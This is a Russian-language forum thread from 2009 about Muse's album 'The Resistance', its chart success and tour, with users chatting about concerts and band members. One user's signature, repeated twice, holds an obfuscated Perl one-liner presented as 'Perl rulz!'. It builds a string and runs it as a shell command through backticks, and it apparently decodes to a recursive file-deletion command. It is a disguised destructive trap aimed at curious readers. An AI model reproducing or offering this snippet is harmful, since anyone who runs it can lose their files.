Добавлено: Вт Сен 22, 2009 9:12 pm Заголовок сообщения:
особо не слушал, из того что слушал местами имхо нудновато) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вт Сен 22, 2009 11:51 pm Заголовок сообщения:
genj
ну, там сидят у костров, и поют "кууумбаааааяяяяя" _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Добавлено: Ср Сен 23, 2009 11:38 am Заголовок сообщения:
У Гуано Эйпс есть вариация на эту тему. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Британские рокеры Muse празднуют очередное карьерное достижение. Новый, пятый в дискографии музыкантов альбом ?The Resistance? в первую же неделю после выхода возглавил чарты сразу в 16 странах мира ? в том числе, Австралии, Мексике, Канаде, Франции, Италии, Корее и родной Великобритании.
Таким образом, ?The Resistance? стал третьей подряд пластинкой Muse, лидировавшей в британском хит-параде ? после ?Absolution? (2003) и ?Black Holes & Revelations? (2006).
В американском чарте Billboard альбом поднялся до третьей позиции ? на сегодня это наивысший результат команды в США.
Напомним, что 23 сентября стартовало концертное турне Muse в поддержку нового диска. До середины октября команда будет гастролировать по США на разогреве у U2, после чего вернется в Европу для проведения турне уже в качестве хэдлайнера. Европейская часть гастролей стартует 22 октября в Хельсинки и завершится в начале декабря в итальянском Турине. С графиком концертов можно ознакомиться на сайте группы.
Хотела на них в Хельсинки поехать,но обломалось всё _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
до границы не больше 250 км _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
насколько я помню у них тот что поет играет на клавишах
могу и ошибаться _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
ALuserX
тот шо поет на гитаре точно играет) Я видел запись их концерта, 2 гитарюги, один из которых солист, барабанщик и где-то в жопе раз виднелся клавишник.